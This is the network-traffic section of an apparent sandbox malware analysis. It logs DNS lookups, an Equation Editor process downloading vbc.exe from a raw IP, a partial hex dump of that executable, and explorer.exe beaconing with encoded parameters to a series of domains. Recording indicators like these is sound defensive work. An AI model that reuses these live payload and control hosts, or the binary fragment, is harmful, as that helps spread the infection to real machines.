                                                                                      Sep 15, 2021 11:19:18.600385904 CEST53543048.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:28.481453896 CEST4989453192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:28.613152981 CEST53498948.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:51.494481087 CEST6464553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:51.622936964 CEST53646458.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.659806013 CEST5374553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:54.693376064 CEST53537458.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:59.824009895 CEST5435853192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST53543588.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:20:04.956995964 CEST6501753192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:20:04.990484953 CEST53650178.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:21:29.345312119 CEST5834153192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:21:29.381974936 CEST53583418.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:21:34.382951021 CEST5638353192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:21:34.426151037 CEST53563838.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:21:39.423052073 CEST6217253192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:21:39.455261946 CEST53621728.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:22:17.646498919 CEST6085953192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:22:17.671439886 CEST53608598.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:23:14.544867039 CEST5905553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:23:14.577768087 CEST53590558.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Sep 15, 2021 11:17:59.482459068 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.americanstonesusa.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:04.942955017 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.plasticplank.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:10.148118019 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.realstyleworks.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:20.351397038 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.authorjameswshepherdonline.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:25.528527021 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.aedenpure.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:30.614634991 CEST192.168.2.228.8.8.80x9037Standard query (0)www.requotation.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:36.949275970 CEST192.168.2.228.8.8.80xce43Standard query (0)www.mysahuarita.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:41.987869978 CEST192.168.2.228.8.8.80xb02bStandard query (0)www.renatradingbv.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:47.027700901 CEST192.168.2.228.8.8.80x43f4Standard query (0)www.oakridge-pm.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:08.294406891 CEST192.168.2.228.8.8.80xa804Standard query (0)www.oakridge-pm.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:13.081938982 CEST192.168.2.228.8.8.80x1d11Standard query (0)www.hanlansmojitovillage.netA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:18.277448893 CEST192.168.2.228.8.8.80x1f97Standard query (0)www.thaibinhgear.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:28.481453896 CEST192.168.2.228.8.8.80x1873Standard query (0)www.goldmig.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:51.494481087 CEST192.168.2.228.8.8.80x8ea6Standard query (0)www.goldmig.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:54.659806013 CEST192.168.2.228.8.8.80x6882Standard query (0)www.thaysay.netA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.824009895 CEST192.168.2.228.8.8.80xdd21Standard query (0)www.asoboawa.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:20:04.956995964 CEST192.168.2.228.8.8.80xc78dStandard query (0)www.onpar-golf.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:29.345312119 CEST192.168.2.228.8.8.80xe633Standard query (0)www.mysahuarita.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:34.382951021 CEST192.168.2.228.8.8.80xcdd2Standard query (0)www.renatradingbv.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:39.423052073 CEST192.168.2.228.8.8.80x76cfStandard query (0)www.oakridge-pm.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:22:17.646498919 CEST192.168.2.228.8.8.80x3f41Standard query (0)www.goldmig.comA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:23:14.544867039 CEST192.168.2.228.8.8.80x495aStandard query (0)www.tomrings.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Sep 15, 2021 11:17:59.700364113 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.americanstonesusa.comamericanstonesusa.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:17:59.700364113 CEST8.8.8.8192.168.2.220x8eb8No error (0)americanstonesusa.com192.99.131.252A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:04.998969078 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.plasticplank.complasticplank.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:04.998969078 CEST8.8.8.8192.168.2.220xc18cNo error (0)plasticplank.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:10.197412014 CEST8.8.8.8192.168.2.220xfc43No error (0)www.realstyleworks.comrealstyleworks.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:10.197412014 CEST8.8.8.8192.168.2.220xfc43No error (0)realstyleworks.com34.98.99.30A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:20.391383886 CEST8.8.8.8192.168.2.220x9c63No error (0)www.authorjameswshepherdonline.comauthorjameswshepherdonline.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:20.391383886 CEST8.8.8.8192.168.2.220x9c63No error (0)authorjameswshepherdonline.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:25.567326069 CEST8.8.8.8192.168.2.220x30e0No error (0)www.aedenpure.com217.160.0.177A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:30.646533012 CEST8.8.8.8192.168.2.220x9037No error (0)www.requotation.comrequotation.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:30.646533012 CEST8.8.8.8192.168.2.220x9037No error (0)requotation.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:36.980983973 CEST8.8.8.8192.168.2.220xce43Name error (3)www.mysahuarita.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:42.020987034 CEST8.8.8.8192.168.2.220xb02bName error (3)www.renatradingbv.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:47.058543921 CEST8.8.8.8192.168.2.220x43f4No error (0)www.oakridge-pm.comoakridge-pm.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:18:47.058543921 CEST8.8.8.8192.168.2.220x43f4No error (0)oakridge-pm.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:08.324367046 CEST8.8.8.8192.168.2.220xa804No error (0)www.oakridge-pm.comoakridge-pm.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:08.324367046 CEST8.8.8.8192.168.2.220xa804No error (0)oakridge-pm.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:13.137840033 CEST8.8.8.8192.168.2.220x1d11No error (0)www.hanlansmojitovillage.nethanlansmojitovillage.netCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:13.137840033 CEST8.8.8.8192.168.2.220x1d11No error (0)hanlansmojitovillage.net34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:18.600385904 CEST8.8.8.8192.168.2.220x1f97No error (0)www.thaibinhgear.comthaibinhgear.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:18.600385904 CEST8.8.8.8192.168.2.220x1f97No error (0)thaibinhgear.com45.252.248.16A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:28.613152981 CEST8.8.8.8192.168.2.220x1873No error (0)www.goldmig.comgoldmig.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:28.613152981 CEST8.8.8.8192.168.2.220x1873No error (0)goldmig.com203.16.60.34A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:51.622936964 CEST8.8.8.8192.168.2.220x8ea6No error (0)www.goldmig.comgoldmig.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:51.622936964 CEST8.8.8.8192.168.2.220x8ea6No error (0)goldmig.com203.16.60.34A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:54.693376064 CEST8.8.8.8192.168.2.220x6882No error (0)www.thaysay.netthaysay.netCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:54.693376064 CEST8.8.8.8192.168.2.220x6882No error (0)thaysay.net34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)www.asoboawa.comcname.landingi.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)cname.landingi.com52.212.68.12A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)cname.landingi.com108.128.238.226A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:19:59.867867947 CEST8.8.8.8192.168.2.220xdd21No error (0)cname.landingi.com54.77.19.84A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:20:04.990484953 CEST8.8.8.8192.168.2.220xc78dNo error (0)www.onpar-golf.comonpar-golf.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:20:04.990484953 CEST8.8.8.8192.168.2.220xc78dNo error (0)onpar-golf.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:29.381974936 CEST8.8.8.8192.168.2.220xe633Name error (3)www.mysahuarita.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:34.426151037 CEST8.8.8.8192.168.2.220xcdd2Name error (3)www.renatradingbv.comnonenoneA (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:39.455261946 CEST8.8.8.8192.168.2.220x76cfNo error (0)www.oakridge-pm.comoakridge-pm.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:21:39.455261946 CEST8.8.8.8192.168.2.220x76cfNo error (0)oakridge-pm.com184.168.131.241A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:22:17.671439886 CEST8.8.8.8192.168.2.220x3f41No error (0)www.goldmig.comgoldmig.comCNAME (Canonical name)IN (0x0001)
                                                                                      Sep 15, 2021 11:22:17.671439886 CEST8.8.8.8192.168.2.220x3f41No error (0)goldmig.com203.16.60.34A (IP address)IN (0x0001)
                                                                                      Sep 15, 2021 11:23:14.577768087 CEST8.8.8.8192.168.2.220x495aNo error (0)www.tomrings.com162.0.214.58A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • 198.23.212.143
                                                                                      • www.americanstonesusa.com
                                                                                      • www.plasticplank.com
                                                                                      • www.realstyleworks.com
                                                                                      • www.authorjameswshepherdonline.com
                                                                                      • www.hanlansmojitovillage.net
                                                                                      • www.thaysay.net
                                                                                      • www.onpar-golf.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249167198.23.212.14380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:16:35.291671038 CEST0OUTGET /ddr/vbc.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: 198.23.212.143
                                                                                      Connection: Keep-Alive
                                                                                      Sep 15, 2021 11:16:35.411237955 CEST1INHTTP/1.1 200 OK
                                                                                      Date: Wed, 15 Sep 2021 16:16:33 GMT
                                                                                      Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
                                                                                      Last-Modified: Wed, 15 Sep 2021 03:32:23 GMT
                                                                                      ETag: "87e00-5cc0058a7b386"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 556544
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-msdownload
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 36 cf 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 08 00 00 08 00 00 00 00 00 00 ca 93 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 93 08 00 4f 00 00 00 00 a0 08 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 5c 93 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 73 08 00 00 20 00 00 00 74 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 a0 08 00 00 06 00 00 00 76 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 7c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 93 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 04 5f 01 00 03 00 00 00 6f 00 00 06 94 9e 01 00 c8 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02 7b 07 00 00 04 58 54 2b 0d 04 04 4a 02 7b 07 00 00 04 58 54 2b 00 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 45 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 7f 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 19 8d 10 00 00 01 0a 2b 00 06 2a 22 02 28 15 00 00 0a 00 2a 00 00 00 13 30 02 00 26 00 00 00 04 00 00 11 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL60t @ @xO\ H.texts t `.rsrcv@@.reloc|@BH?_o~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rp+*0+*"(*0&
                                                                                      Sep 15, 2021 11:16:35.413852930 CEST3INData Raw: 03 16 32 12 04 16 32 0e 03 05 2f 0a 04 0e 04 fe 04 16 fe 01 2b 01 17 0a 06 2c 04 16 0b 2b 04 17 0b 2b 00 07 2a 22 02 28 15 00 00 0a 00 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 00 00
                                                                                      Data Ascii: 22/+,++*"(*{*"}*{*"}*0{{,X{{,X+2{{,Y+{{,Y (((*"(*Z(
                                                                                      Sep 15, 2021 11:16:35.413883924 CEST4INData Raw: 02 28 39 00 00 06 16 fe 01 0b 07 2d ab 02 28 3a 00 00 06 00 2a 8a 00 28 1f 00 00 0a 00 16 28 20 00 00 0a 00 1f 0c 28 21 00 00 0a 00 72 07 01 00 70 28 22 00 00 0a 00 2a 00 13 30 02 00 17 00 00 00 0b 00 00 11 00 02 7b 1b 00 00 04 7b 0c 00 00 04 16
                                                                                      Data Ascii: (9-(:*(( (!rp("*0{{+*0K{{{{3{{{{+,{|#(**"JXT*N(rp("*0i{{{{
                                                                                      Sep 15, 2021 11:16:35.413907051 CEST6INData Raw: 06 11 06 3a 9b fe ff ff 28 25 00 00 0a 00 00 06 17 58 0a 06 7e 20 00 00 04 fe 04 13 07 11 07 3a 77 fe ff ff 02 28 37 00 00 06 00 28 25 00 00 0a 00 02 28 38 00 00 06 00 2a 00 00 13 30 01 00 3a 00 00 00 04 00 00 11 00 1f 0f 28 21 00 00 0a 00 02 28
                                                                                      Data Ascii: :(%X~ :w(7(%(8*0:(!(/,(!(-,(!{o?*0((!(.,(!{o@*0P{{#{{,(++%{{
                                                                                      Sep 15, 2021 11:16:35.525995970 CEST7INData Raw: 00 02 7b 2d 00 00 04 17 6f 47 00 00 0a 00 02 7b 2d 00 00 04 72 1d 02 00 70 6f 43 00 00 0a 00 02 7b 2d 00 00 04 17 6f 48 00 00 0a 00 02 7b 2d 00 00 04 18 6f 49 00 00 0a 00 02 7b 2d 00 00 04 20 45 02 00 00 20 f8 00 00 00 73 44 00 00 0a 6f 45 00 00
                                                                                      Data Ascii: {-oG{-rpoC{-oH{-oI{- E sDoE{-oF{. @sAoB{.r3poC{.KsDoE{.oF{.rCpo:{.oJ{.OsKoL"@"PAsM
                                                                                      Sep 15, 2021 11:16:35.526036978 CEST8INData Raw: 00 04 28 70 00 00 0a 6f 71 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 4d 00 00 0a 28 4e 00 00 0a 00 02 17 28 4f 00 00 0a 00 02 20 ee 00 00 00 20 23 02 00 00 73 44 00 00 0a 28 50 00 00 0a 00 02 28 51 00 00 0a 02 7b 38 00 00 04 6f 52 00 00 0a
                                                                                      Data Ascii: (poq"@"PAsM(N(O #sD(P(Q{8oR(Q{7oRr-p(Cr.po:fsr(sbsK(U{7ot(V*0w(ur.po7Xsvswox
                                                                                      Sep 15, 2021 11:16:35.526066065 CEST10INData Raw: 06 11 10 6f 91 00 00 0a 26 2b 06 2b 04 2b 02 2b 00 00 17 13 18 38 8c fd ff ff 6a 00 28 92 00 00 0a 00 16 28 93 00 00 0a 00 73 60 00 00 06 28 94 00 00 0a 00 2a 13 30 01 00 0c 00 00 00 1e 00 00 11 00 02 7b 3b 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d
                                                                                      Data Ascii: o&++++8j((s`(*0{;+*&};*0{<+*0T}<{?oSo:{@oWo:{>{;{9ooUoo*^}=((x**0
                                                                                      Sep 15, 2021 11:16:35.526093006 CEST11INData Raw: 10 3b 10 0a 00 11 0c 45 09 0a 00 91 0f 3b 10 06 00 5c 04 b0 09 12 00 11 12 51 0f 12 00 5b 09 51 0f 12 00 36 11 51 0f 06 00 0c 01 be 07 12 00 fb 0e 51 0f 06 00 d2 0e 57 12 06 00 4c 01 57 12 06 00 78 12 98 0a 0e 00 9b 07 51 08 0a 00 85 12 a7 0f 06
                                                                                      Data Ascii: ;E;\Q[Q6QQWLWxQ<Q?QxQlQQQQ[1QQQOQXE
                                                                                      Sep 15, 2021 11:16:35.526125908 CEST12INData Raw: 0d 5f 00 0e 00 f1 22 00 00 00 00 86 18 2f 0d 06 00 10 00 fb 22 00 00 00 00 86 18 2f 0d 21 04 10 00 2a 23 00 00 00 00 86 00 d4 11 06 00 15 00 39 23 00 00 00 00 86 00 39 0b 5f 00 15 00 4a 23 00 00 00 00 86 00 c0 02 06 00 17 00 59 23 00 00 00 00 86
                                                                                      Data Ascii: _"/"/!*#9#9_J#Y#/*#####($/1$/<$~1$%%
                                                                                      Sep 15, 2021 11:16:35.526148081 CEST14INData Raw: 00 00 00 86 08 5b 02 62 04 49 00 84 3c 00 00 00 00 86 08 69 02 5c 04 49 00 e4 3c 00 00 00 00 86 18 2f 0d 06 00 4a 00 fc 3c 00 00 00 00 81 00 36 01 67 04 4a 00 00 3d 00 00 00 00 81 00 eb 08 67 04 4c 00 28 3d 00 00 00 00 c4 00 bc 04 15 00 4e 00 60
                                                                                      Data Ascii: [bI<i\I</J<6gJ=gL(=N`=O/OT\QOREU"J"hZ<<{
                                                                                      Sep 15, 2021 11:16:35.526170015 CEST15INData Raw: 02 b9 02 2f 0d 96 01 09 01 22 08 33 02 81 02 71 10 06 00 09 02 4e 00 57 01 81 01 2f 0d 49 02 89 01 2f 0d 06 00 c9 02 e5 0e 52 02 d1 02 3c 12 58 02 d1 02 7b 00 58 02 d1 02 3c 0d 5e 02 d9 02 04 09 64 02 e1 02 b4 12 6d 02 91 01 43 01 80 02 f1 02 10
                                                                                      Data Ascii: /"3qNW/I/R<X{X<^dmC3QY!HI1/I1B!*a07i<19BTHAAA2Q1]Yd/I


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.2249168192.99.131.25280C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:17:59.820272923 CEST585OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:17:59.929552078 CEST586INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:17:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      10192.168.2.224918534.98.99.3080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:20.496011972 CEST606OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:20.611011028 CEST607INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
